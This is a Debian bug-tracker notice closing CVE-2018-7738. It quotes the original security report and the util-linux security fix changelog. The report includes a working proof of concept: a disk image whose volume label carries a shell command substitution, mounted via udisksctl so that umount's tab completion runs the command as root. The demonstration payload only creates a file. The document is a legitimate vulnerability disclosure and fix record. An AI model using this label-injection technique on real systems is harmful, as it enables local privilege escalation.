Your message dated Sun, 11 Mar 2018 21:02:07 +0000
with message-id <[email protected]>
and subject line Bug#892179: fixed in util-linux 2.29.2-1+deb9u1
has caused the Debian Bug report #892179,
regarding util-linux: CVE-2018-7738: code execution in bash-completion for
umount
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
892179: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: bash-completion
Version: 1:2.1-4.3
Severity: grave
Tags: security
Hi,
when bash-completion is installed, it uses
/usr/share/bash-completion/completions/umount from umount package to
provide autocompletion. This script does not escape mount paths
correctly, so it allows a local user with rights to mount filesystems to
execute commands in the context of the umount user (probably root).
Unprivileged users can mount filesystems with custom mountpoints using
udisks2, FUSE or with the help of desktop environments.
Example:
as regular user:
------------------------------
$ mkdir empty
$ genisoimage -o test.iso -V '$(IFS=":";cmd="touch:foo";$cmd)' empty
I: -input-charset not specified, using utf-8 (detected in locale settings)
Total translation table size: 0
Total rockridge attributes bytes: 0
Total directory bytes: 0
Path table size(bytes): 10
Max brk space used 0
174 extents written (0 MB)
$ udisksctl loop-setup -f test.iso
Mapped file test.iso as /dev/loop0.
(if not mounted by automounter already)
$ udisksctl mount -b /dev/loop0
Mounted /dev/loop0 at /media/user/$(IFS=":";cmd="touch:foo";$cmd).
------------------------------
as different user or even root:
------------------------------
# ls -la
total 28
drwxr-xr-x 2 root root 4096 Feb 14 10:00 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
# umount <TAB> ^C
# ls -la
total 28
drwxr-xr-x 2 root root 4096 Feb 14 10:01 .
drwxrwxrwt 29 root root 24576 Feb 14 10:00 ..
-rw-r--r-- 1 root root 0 Feb 14 10:01 foo
------------------------------
I tested it using latest Debian GNU/Linux 9.3 (stretch) using default
installation with desktop environment.
Involved packages:
mount 2.29.2-1
bash 4.4-5
bash-completion 1:2.1-4.3
genisoimage 9:1.1.11-3+b2
udisks2 2.1.8-1
uname -a
Linux id382 4.9.0-6-amd64 #1 SMP Debian 4.9.82-1+deb9u3 (2018-03-02)
x86_64 GNU/Linux
It seems to be fixed in upstream util-linux already because of a similar
bugfix:
https://github.com/karelzak/util-linux/commit/75f03badd7ed9f1dd951863d75e756883d3acc55#diff-a47601b5dbce9dc06c3af1deb02758c7
Björn Bosselmann
G DATA Software AG
-- System Information:
Debian Release: 9.3
APT prefers stable-updates
APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 4.9.0-6-amd64 (SMP w/8 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8),
LANGUAGE= (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)
Versions of packages bash-completion depends on:
ii bash 4.4-5
ii dpkg 1.18.24
bash-completion recommends no packages.
bash-completion suggests no packages.
-- no debconf information
signature.asc
Description: OpenPGP digital signature
--- End Message ---
--- Begin Message ---
Source: util-linux
Source-Version: 2.29.2-1+deb9u1
We believe that the bug you reported is fixed in the latest version of
util-linux, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Salvatore Bonaccorso <[email protected]> (supplier of updated util-linux
package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Wed, 07 Mar 2018 19:29:09 +0100
Source: util-linux
Binary: util-linux util-linux-locales mount bsdutils fdisk-udeb libblkid1
libblkid1-udeb libblkid-dev libfdisk1 libfdisk1-udeb libfdisk-dev libmount1
libmount1-udeb libmount-dev libsmartcols1 libsmartcols1-udeb libsmartcols-dev
libuuid1 uuid-runtime libuuid1-udeb uuid-dev util-linux-udeb setpriv
Architecture: source
Version: 2.29.2-1+deb9u1
Distribution: stretch-security
Urgency: high
Maintainer: Debian util-linux Maintainers <[email protected]>
Changed-By: Salvatore Bonaccorso <[email protected]>
Closes: 892179
Description:
bsdutils - basic utilities from 4.4BSD-Lite
fdisk-udeb - Manually partition a hard drive (fdisk) (udeb)
libblkid-dev - block device ID library - headers and static libraries
libblkid1 - block device ID library
libblkid1-udeb - stripped down block device ID library, for debian-installer
(udeb)
libfdisk-dev - fdisk partitioning library - headers and static libraries
libfdisk1 - fdisk partitioning library
libfdisk1-udeb - stripped down fdisk partitioning library, for
debian-installer (udeb)
libmount-dev - device mounting library - headers and static libraries
libmount1 - device mounting library
libmount1-udeb - stripped down device mounting library, for debian-installer
(udeb)
libsmartcols-dev - smart column output alignment library - headers and static
librar
libsmartcols1 - smart column output alignment library
libsmartcols1-udeb - stripped down smart column output aligment library, for
debian-in (udeb)
libuuid1 - Universally Unique ID library
libuuid1-udeb - stripped down Universally Unique ID library, for
debian-installer (udeb)
mount - tools for mounting and manipulating filesystems
setpriv - tool to run a program with different Linux privilege settings
util-linux - miscellaneous system utilities
util-linux-locales - locales files for util-linux
util-linux-udeb - stripped down miscellaneous system utilities, for
debian-installe (udeb)
uuid-dev - Universally Unique ID library - headers and static libraries
uuid-runtime - runtime components for the Universally Unique ID library
Changes:
util-linux (2.29.2-1+deb9u1) stretch-security; urgency=high
.
* Non-maintainer upload by the Security Team.
* bash-completion: (umount) use findmnt, escape a space in paths
(CVE-2018-7738) (Closes: #892179)
Checksums-Sha1:
5575478b2b095f0df2f6c30aa21fef1dbecb9acc 4101 util-linux_2.29.2-1+deb9u1.dsc
b488f185e74187a63b55baef9d3f48d5b1780118 4277668 util-linux_2.29.2.orig.tar.xz
3d73e73f2402bf7b2b61c1e4e7c451d59e32db11 74280
util-linux_2.29.2-1+deb9u1.debian.tar.xz
Checksums-Sha256:
f84985e3b01d7758bf835484a5861d687ffee07778dadab5adc10a7e312da950 4101
util-linux_2.29.2-1+deb9u1.dsc
accea4d678209f97f634f40a93b7e9fcad5915d1f4749f6c47bee6bf110fe8e3 4277668
util-linux_2.29.2.orig.tar.xz
33867c063f828a1937c1dd4797b3cd977a2e7da31eb1227c396f7dbf06dde3a6 74280
util-linux_2.29.2-1+deb9u1.debian.tar.xz
Files:
5041092813b91904152dd2bbe25504f8 4101 base required
util-linux_2.29.2-1+deb9u1.dsc
63c40c2068fcbb7e1d5c1d281115d973 4277668 base required
util-linux_2.29.2.orig.tar.xz
7532de196c10edf323d41a8cdd745a8f 74280 base required
util-linux_2.29.2-1+deb9u1.debian.tar.xz
-----BEGIN PGP SIGNATURE-----
iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlqgMNZfFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk
ZWJpYW4ub3JnAAoJEAVMuPMTQ89E4ykP/Aofd0Y71fCrIL/eFpvqoOGb/EhPhntd
LhJSRnv27f+OfOTQuHp9USZij5W2Mvs9DkGMWYVJbkUmDJcxxPcFZ0D85Ivb+iHp
+bIvfw4jxSPfjVwObew62ZjF1QG+YBCwLrFHrYAJpKmoW3+34CiuDauva38+mtCl
FPBfitqZ5MIIe3RHCd62IOa6UfOxeb+8ZbY0XZyKk7iB0t9ze6JitdqhOH3UjH1o
z58+zM7wbQUT4qVMvDmDDdnDYfJmPGzeLlxujscjZYXDCW+TQRoMF+RG8uIbyVqZ
pV+cwuWa+G4pCR8Pqqn2nyekxzYUUfg5iYf3amNgJFRX6XHVniTOMYwOqBKBRwLA
qFtk8BEGVwrIPbTcjvtl7bjqJRJW/YIOL3+EwdcCiizyTOiMLI0UsP2YzWmKoopv
cLOBChb6FHtqq7PJCqq1gOwUg/RcDYfkjOCpXoSX3XkKMNNHExSvePcyaEhyqQdA
+WG541Bw102xJc06LbRVBMxjcf/bUC7iBVXOvZ66KTcckRSccv1U/dn4rZuOTOG7
4EYXDuZbH0ER1J62wLXgOIeHVxe9urfd1AYHU/7b08VxdTbN0sDA7Kn9iCXY+qfJ
rYBh1jsTfwLHWHHCV4ttjuWiBMRFXgiWMMb660UMMgcghyWlb6pIlUgboXPlyETW
0Kn0GQnxQGZW
=61qI
-----END PGP SIGNATURE-----
--- End Message ---
